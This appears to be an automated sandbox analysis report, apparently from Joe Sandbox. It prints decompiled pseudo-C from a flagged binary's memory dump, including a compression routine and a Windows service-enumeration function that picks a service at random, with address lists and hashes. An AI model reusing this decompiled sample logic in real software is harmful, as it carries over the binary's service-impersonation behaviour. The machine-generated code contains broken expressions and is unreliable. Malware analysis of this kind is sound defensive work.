									E0040FDD0( &_v356 + _t337, 0, _t358);
									_t393 = _t393 + 0xc;
									_t379 = _v24;
									_t337 = _t337 + _v12;
								}
								_t310 = _v20;
								_v12 = 0;
							}
							if(_t379 == _t310) {
								_t381 = _v8 + 1;
								_v8 = _t381;
								if(_t381 == 6) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									_t381 = 0;
									 *(_t390 + _t337 - 0x160) = 0x310;
									_v8 = 0;
									goto L33;
								}
							} else {
								_t362 = _v8;
								if(_t362 != 0) {
									if(_t362 >= 3) {
										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
										 *(_t390 + _t337 - 0x160) = 0x10;
										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
										_t337 = _t337 + 2;
									} else {
										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
										E0040FDD0( &_v356 + _t337, _v20, _t362);
										_t379 = _v24;
										_t393 = _t393 + 0xc;
										_t337 = _t337 + _v8;
									}
									_v8 = 0;
								}
								 *(_t390 + _t337 - 0x160) = _t379;
								_t381 = _v8;
								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
								_t337 = _t337 + 1;
							}
						} else {
							_t366 = _v8;
							if(_t366 != 0) {
								if(_t366 >= 3) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									 *(_t390 + _t337 - 0x160) = 0x10;
									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
									_t337 = _t337 + 2;
								} else {
									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
									E0040FDD0( &_v356 + _t337, _v20, _t366);
									_t393 = _t393 + 0xc;
									_t337 = _t337 + _v8;
								}
								_v8 = 0;
							}
							_t381 = _v8;
							_t368 = _v12 + 1;
							_v12 = _t368;
							if(_t368 == 0x8a) {
								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
								 *(_t390 + _t337 - 0x160) = 0x7f12;
								_v12 = 0;
								L33:
								_t337 = _t337 + 2;
							}
						}
						_v28 = _v28 + 1;
						_t310 = _v24;
						_t360 = _v12;
						_v20 = _t310;
					} while (_v28 < _v36);
					if(_t381 == 0) {
						if(_t360 != 0) {
							if(_t360 >= 3) {
								if(_t360 > 0xa) {
									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
									_t361 = _t360 - 0xb;
									 *(_t390 + _t337 - 0x160) = 0x12;
								} else {
									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
									_t361 = _t360 - 3;
									 *(_t390 + _t337 - 0x160) = 0x11;
								}
								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
								goto L46;
							} else {
								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
								E0040FDD0( &_v356 + _t337, 0, _t360);
								_t393 = _t393 + 0xc;
								_t337 = _t337 + _v12;
							}
						}
					} else {
						if(_t381 >= 3) {
							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
							 *(_t390 + _t337 - 0x160) = 0x10;
							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
							L46:
							_t337 = _t337 + 2;
						} else {
							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
							E0040FDD0( &_v356 + _t337, _v24, _t381);
							_t393 = _t393 + 0xc;
							_t337 = _t337 + _v8;
						}
					}
				}
				_push(0);
				_push(7);
				_push(0x13);
				_t385 = 2;
				E00402D85(_t383, _t385);
				_t341 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
				_t387 = 0xfffffff8;
				_t283 = _t341 + 2;
				_t374 = 8;
				 *(_t383 + 0x44) = _t283;
				if(_t283 >= _t374) {
					do {
						_t356 =  *(_t383 + 0x30);
						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t356 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t342 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
				_t287 = _t342 + 5;
				 *(_t383 + 0x44) = _t287;
				if(_t287 >= _t374) {
					do {
						_t355 =  *(_t383 + 0x30);
						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t355 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t343 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
				_t291 = _t343 + 5;
				 *(_t383 + 0x44) = _t291;
				if(_t291 >= _t374) {
					do {
						_t354 =  *(_t383 + 0x30);
						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t354 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t344 = 0x12;
				while(1) {
					_t186 = _t344 + 0x4111a0; // 0xf
					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
						break;
					}
					_t344 = _t344 - 1;
					if(_t344 >= 0) {
						continue;
					}
					break;
				}
				_t189 = _t344 + 1; // 0x12
				_t345 = 4;
				_t294 =  <  ? _t345 : _t189;
				_t346 =  *(_t383 + 0x44);
				_v16 = _t294;
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
				_t297 = _t346 + 4;
				 *(_t383 + 0x44) = _t297;
				if(_t297 >= _t374) {
					do {
						_t353 =  *(_t383 + 0x30);
						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
							_t297 =  *(_t383 + 0x48);
							 *_t353 = _t297;
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t388 = 0;
				_t375 = 0;
				if(_v16 > 0) {
					_t389 = _v16;
					do {
						_t208 = _t375 + 0x4111a0; // 0x121110
						_t351 =  *(_t383 + 0x44);
						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
						_t297 = _t351 + 3;
						 *(_t383 + 0x44) = _t297;
						if(_t297 >= 8) {
							do {
								_t352 =  *(_t383 + 0x30);
								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
									_t297 =  *(_t383 + 0x48);
									 *_t352 = _t297;
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t375 = _t375 + 1;
					} while (_t375 < _t389);
					_t388 = 0;
				}
				if(_t337 != 0) {
					do {
						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
						_t388 = _t388 + 1;
						_t347 =  *(_t383 + 0x44);
						_v16 = _t298;
						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
						 *(_t383 + 0x44) = _t301;
						if(_t301 >= 8) {
							do {
								_t350 =  *(_t383 + 0x30);
								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
									 *_t350 =  *(_t383 + 0x48);
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t297 = _v16;
						if(_t297 >= 0x10) {
							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
							_t388 = _t388 + 1;
							_t348 =  *(_t383 + 0x44);
							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
							 *(_t383 + 0x44) = _t297;
							if(_t297 >= 8) {
								do {
									_t349 =  *(_t383 + 0x30);
									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
										_t297 =  *(_t383 + 0x48);
										 *_t349 = _t297;
										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
									}
									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
								} while ( *(_t383 + 0x44) >= 8);
							}
						}
					} while (_t388 < _t337);
				}
				return _t297;
			}





























































                  0x00402f90
                  0x00402f94
                  0x00402fa3
                  0x00402faa
                  0x00402fb8
                  0x00402fbd
                  0x00402fc0
                  0x00402fc5
                  0x00402fcf
                  0x00402fd6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fd6
                  0x00402fda
                  0x00402fdd
                  0x00402fde
                  0x00402fe8
                  0x00402fec
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fec
                  0x00402fee
                  0x00403000
                  0x00403019
                  0x00403024
                  0x00403026
                  0x0040302d
                  0x00403030
                  0x0040303b
                  0x00403041
                  0x00403044
                  0x0040304a
                  0x00403050
                  0x00403053
                  0x00403056
                  0x0040305d
                  0x00403062
                  0x004030eb
                  0x004030f0
                  0x004030f5
                  0x0040311e
                  0x00403134
                  0x0040313b
                  0x0040313e
                  0x00403120
                  0x00403120
                  0x00403127
                  0x0040312a
                  0x0040312a
                  0x00403146
                  0x0040314d
                  0x004030f7
                  0x004030f7
                  0x00403109
                  0x00403111
                  0x00403114
                  0x00403117
                  0x00403117
                  0x00403150
                  0x00403155
                  0x00403155
                  0x0040315a
                  0x004031cc
                  0x004031cd
                  0x004031d3
                  0x004031d5
                  0x004031dc
                  0x004031de
                  0x004031e8
                  0x00000000
                  0x004031e8
                  0x0040315c
                  0x0040315c
                  0x00403161
                  0x00403166
                  0x00403190
                  0x0040319a
                  0x004031a2
                  0x004031a9
                  0x00403168
                  0x0040316f
                  0x00403180
                  0x00403185
                  0x00403188
                  0x0040318b
                  0x0040318b
                  0x004031ae
                  0x004031ae
                  0x004031b4
                  0x004031bb
                  0x004031be
                  0x004031c6
                  0x004031c6
                  0x00403068
                  0x00403068
                  0x0040306d
                  0x00403072
                  0x00403099
                  0x004030a3
                  0x004030ab
                  0x004030b2
                  0x00403074
                  0x0040307b
                  0x0040308c
                  0x00403091
                  0x00403094
                  0x00403094
                  0x004030b7
                  0x004030b7
                  0x004030bd
                  0x004030c0
                  0x004030c1
                  0x004030ca
                  0x004030d0
                  0x004030d9
                  0x004030e3
                  0x004031eb
                  0x004031eb
                  0x004031eb
                  0x004030ca
                  0x004031f1
                  0x004031f4
                  0x004031fc
                  0x004031ff
                  0x004031ff
                  0x0040320a
                  0x00403253
                  0x00403258
                  0x0040327c
                  0x00403292
                  0x00403299
                  0x0040329c
                  0x0040327e
                  0x0040327e
                  0x00403285
                  0x00403288
                  0x00403288
                  0x004032a4
                  0x00000000
                  0x0040325a
                  0x0040325a
                  0x0040326c
                  0x00403271
                  0x00403274
                  0x00403274
                  0x00403258
                  0x0040320c
                  0x0040320f
                  0x00403236
                  0x00403240
                  0x00403248
                  0x004032ab
                  0x004032ab
                  0x00403211
                  0x00403218
                  0x00403229
                  0x0040322e
                  0x00403231
                  0x00403231
                  0x0040320f
                  0x0040320a
                  0x004032ae
                  0x004032af
                  0x004032b1
                  0x004032b5
                  0x004032ba
                  0x004032bf
                  0x004032c7
                  0x004032cc
                  0x004032cf
                  0x004032d2
                  0x004032d3
                  0x004032d8
                  0x004032da
                  0x004032da
                  0x004032e0
                  0x004032e5
                  0x004032e7
                  0x004032e7
                  0x004032ea
                  0x004032ee
                  0x004032f1
                  0x004032da
                  0x004032f6
                  0x00403303
                  0x00403306
                  0x00403309
                  0x0040330e
                  0x00403310
                  0x00403310
                  0x00403316
                  0x0040331b
                  0x0040331d
                  0x0040331d
                  0x00403320
                  0x00403324
                  0x00403327
                  0x00403310
                  0x0040332c
                  0x00403335
                  0x00403338
                  0x0040333b
                  0x00403340
                  0x00403342
                  0x00403342
                  0x00403348
                  0x0040334d
                  0x0040334f
                  0x0040334f
                  0x00403352
                  0x00403356
                  0x00403359
                  0x00403342
                  0x00403360
                  0x00403361
                  0x00403361
                  0x00403370
                  0x00000000
                  0x00000000
                  0x00403372
                  0x00403373
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403373
                  0x00403375
                  0x0040337a
                  0x0040337d
                  0x00403380
                  0x00403383
                  0x0040338b
                  0x0040338e
                  0x00403391
                  0x00403396
                  0x00403398
                  0x00403398
                  0x0040339e
                  0x004033a0
                  0x004033a3
                  0x004033a5
                  0x004033a5
                  0x004033a8
                  0x004033ac
                  0x004033af
                  0x00403398
                  0x004033b4
                  0x004033b6
                  0x004033bb
                  0x004033bd
                  0x004033c0
                  0x004033c0
                  0x004033c7
                  0x004033d4
                  0x004033d7
                  0x004033da
                  0x004033e0
                  0x004033e2
                  0x004033e2
                  0x004033e8
                  0x004033ea
                  0x004033ed
                  0x004033ef
                  0x004033ef
                  0x004033f2
                  0x004033f6
                  0x004033fa
                  0x004033e2
                  0x00403400
                  0x00403401
                  0x00403405
                  0x00403405
                  0x00403409
                  0x0040340f
                  0x0040340f
                  0x00403417
                  0x00403418
                  0x0040341b
                  0x00403430
                  0x00403433
                  0x00403436
                  0x0040343c
                  0x0040343e
                  0x0040343e
                  0x00403444
                  0x00403449
                  0x0040344b
                  0x0040344b
                  0x0040344e
                  0x00403452
                  0x00403456
                  0x0040343e
                  0x0040345c
                  0x00403462
                  0x00403464
                  0x0040346c
                  0x00403474
                  0x00403477
                  0x0040347b
                  0x0040347e
                  0x00403484
                  0x00403486
                  0x00403486
                  0x0040348c
                  0x0040348e
                  0x00403491
                  0x00403493
                  0x00403493
                  0x00403496
                  0x0040349a
                  0x0040349e
                  0x00403486
                  0x00403484
                  0x004034a4
                  0x0040340f
                  0x004034b2

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F504, Relevance: 13.6, APIs: 9, Instructions: 120serviceCOMMON
                  Download Yara Rule
                  C-Code - Quality: 15%
                  			E0040F504(void* __ecx, intOrPtr* __edx) {
				char _v8;
				char _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr _t39;
				void* _t40;
				void* _t48;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				short** _t65;

				_t62 = __ecx;
				_v36 = __edx;
				_v24 = __ecx;
				_push(0);
				_push(0);
				_t48 = 0;
				_push( &_v16);
				_push( &_v8);
				_push(0);
				_push(0);
				_push(3);
				_push(0x30);
				_push(0);
				_push(__ecx);
				if( *0x412fe8() != 0 || GetLastError() != 0xea) {
					L19:
					return _t48;
				} else {
					_t59 = E004014F2(_v8);
					_v32 = _t59;
					if(_t59 == 0) {
						L18:
						goto L19;
					}
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v8);
					_push(_v8);
					_push(_t59);
					_push(3);
					_push(0x30);
					_push(0);
					_push(_t62);
					if( *0x412fe8() == 0) {
						_t61 = _v28;
						goto L16;
					} else {
						_t64 = (GetTickCount() & 0x0000000f) * 0x2c + _t59;
						_t39 = _v16 * 0x2c + _t64;
						_v28 = _t39;
						_t65 =  >=  ? _t59 : _t64;
						_t61 = _v28;
						while(_t65 < _t39) {
							_t40 = OpenServiceW(_v24,  *_t65, 1);
							_v20 = _t40;
							if(_t40 == 0) {
								L13:
								_t39 = _v28;
								_t65 =  &(_t65[0xb]);
								if(_t48 == 0) {
									continue;
								}
								break;
							}
							_push( &_v12);
							_push(0);
							_push(0);
							_push(1);
							_push(_t40);
							if( *0x4135b4() == 0 && GetLastError() == 0x7a) {
								_t61 = E004014F2(_v12);
								if(_t61 != 0) {
									_t48 =  *0x4135b4(_v20, 1, _t61, _v12,  &_v12);
									if(_t48 == 0) {
										E00401532(_t61);
									}
								}
							}
							CloseServiceHandle(_v20);
							goto L13;
						}
						L16:
						E00401532(_v32);
						if(_t48 != 0) {
							 *_v36 = _t61;
						}
						goto L18;
					}
				}
			}



















                  0x0040f50c
                  0x0040f50e
                  0x0040f513
                  0x0040f516
                  0x0040f517
                  0x0040f51b
                  0x0040f51d
                  0x0040f521
                  0x0040f522
                  0x0040f523
                  0x0040f524
                  0x0040f526
                  0x0040f528
                  0x0040f529
                  0x0040f532
                  0x0040f633
                  0x0040f639
                  0x0040f549
                  0x0040f552
                  0x0040f554
                  0x0040f559
                  0x0040f631
                  0x00000000
                  0x0040f631
                  0x0040f564
                  0x0040f565
                  0x0040f566
                  0x0040f56a
                  0x0040f56b
                  0x0040f56e
                  0x0040f56f
                  0x0040f571
                  0x0040f573
                  0x0040f574
                  0x0040f57d
                  0x0040f61d
                  0x00000000
                  0x0040f583
                  0x0040f593
                  0x0040f595
                  0x0040f599
                  0x0040f59c
                  0x0040f59f
                  0x0040f5a2
                  0x0040f5ad
                  0x0040f5b3
                  0x0040f5b8
                  0x0040f611
                  0x0040f611
                  0x0040f614
                  0x0040f619
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f61b
                  0x0040f5bd
                  0x0040f5be
                  0x0040f5c0
                  0x0040f5c2
                  0x0040f5c4
                  0x0040f5cd
                  0x0040f5e2
                  0x0040f5e6
                  0x0040f5fb
                  0x0040f5ff
                  0x0040f603
                  0x0040f603
                  0x0040f5ff
                  0x0040f5e6
                  0x0040f60b
                  0x00000000
                  0x0040f60b
                  0x0040f620
                  0x0040f623
                  0x0040f62a
                  0x0040f62f
                  0x0040f62f
                  0x00000000
                  0x0040f62a
                  0x0040f57d

                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,0040F83E,?,00000000,00000000), ref: 0040F52A
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,0040F83E,0040F83E,?,00000000,00000000), ref: 0040F575
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5C5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5F5
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,0040F83E), ref: 0040F60B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 004037A9, Relevance: 7.9, APIs: 3, Strings: 2, Instructions: 416UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _t271;
				signed char _t279;
				intOrPtr _t283;
				intOrPtr _t291;
				signed int _t299;
				signed int _t300;
				signed char _t303;
				signed char _t306;
				signed char _t315;
				signed char _t324;
				signed char _t327;
				signed char _t333;
				signed int _t342;
				signed char _t344;
				signed char _t348;
				intOrPtr _t357;
				signed int _t358;
				void* _t359;
				void* _t362;
				intOrPtr _t363;
				signed char _t366;
				intOrPtr _t367;
				signed char _t370;
				signed char _t371;
				signed char _t372;
				char* _t373;
				char* _t374;
				char* _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				signed char _t382;
				signed char _t383;
				signed char _t384;
				char* _t385;
				char* _t386;
				char* _t387;
				char* _t388;
				char* _t393;
				signed char _t394;
				signed char _t395;
				char* _t396;
				char* _t397;
				intOrPtr _t398;
				int _t400;
				intOrPtr _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				void* _t406;
				void* _t410;
				intOrPtr _t411;
				int _t414;
				void* _t415;
				signed char _t416;
				intOrPtr* _t417;

				_t417 = __ecx;
				_t357 = __edx;
				_v20 = __edx;
				_v16 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
					_t400 = 0;
				} else {
					_t400 = 1;
				}
				if( *_t417 != 0) {
					L7:
					_t271 = _t417 + 0x39272;
					goto L8;
				} else {
					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
						goto L7;
					} else {
						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
						L8:
						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
						_v12 = _t271;
						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
						 *(_t417 + 0x58) = 0;
						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
						_t410 = 8;
						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
							L18:
							_t366 =  *(_t417 + 0x44);
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
							_t64 = _t366 + 1; // 0xf9
							_t279 = _t64;
							 *(_t417 + 0x44) = _t279;
							if(_t279 < _t410) {
								L22:
								_t411 =  *((intOrPtr*)(_t417 + 0x30));
								_t358 =  *(_t417 + 0x44);
								_v8 =  *(_t417 + 0x48);
								if(_t400 != 0) {
									_t401 = _v16;
									L47:
									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
										L28:
										if(_t401 == 0) {
											_t87 =  &_v8; // 0x40473a
											 *(_t417 + 0x48) =  *_t87;
											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
											 *(_t417 + 0x44) = _t358;
											E0040378E(_t417, _t401 + 1);
										}
										_t359 = 2;
										L31:
										_t283 = _v20;
										if(_t283 == 0) {
											L84:
											memset(_t417 + 0x8192, 0, 0x240);
											memset(_t417 + 0x83d2, 0, 0x40);
											 *(_t417 + 0x38) = 8;
											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
											 *(_t417 + 0x2c) = _t417 + 0x9272;
											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
											_t291 = _v12;
											 *(_t417 + 0x3c) = 0;
											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
											if(_t362 == 0) {
												L92:
												return  *((intOrPtr*)(_t417 + 0x5c));
											}
											if( *_t417 == 0) {
												_t402 = _t417 + 0x39272;
												if(_t291 != _t402) {
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
												} else {
													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
													_t363 = _t362 - _t414;
													if(_t363 != 0) {
														 *(_t417 + 0x58) = _t414;
														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
													}
												}
												goto L92;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
											if(_t299 != 0) {
												goto L92;
											}
											_t300 = _t299 | 0xffffffff;
											 *(_t417 + 0x6c) = _t300;
											return _t300;
										}
										_t370 =  *(_t417 + 0x44);
										_t415 = 4;
										if(_t283 != _t415) {
											_t403 = 0;
											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
											_t303 = _t370 + 3;
											 *(_t417 + 0x44) = _t303;
											if(_t303 < 8) {
												L74:
												_t371 =  *(_t417 + 0x44);
												if(_t371 == 0) {
													do {
														L79:
														_t372 =  *(_t417 + 0x44);
														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
														_t227 = _t372 + 0x10; // 0x18
														_t306 = _t227;
														 *(_t417 + 0x44) = _t306;
														if(_t306 < 8) {
															goto L83;
														} else {
															goto L80;
														}
														do {
															L80:
															_t373 =  *((intOrPtr*)(_t417 + 0x30));
															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
																 *_t373 =  *(_t417 + 0x48);
																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
															}
															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
														} while ( *(_t417 + 0x44) >= 8);
														L83:
														_t403 = _t403 ^ 0x0000ffff;
														_t359 = _t359 - 1;
													} while (_t359 != 0);
													goto L84;
												}
												 *(_t417 + 0x44) = 8;
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
												do {
													_t374 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t374 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
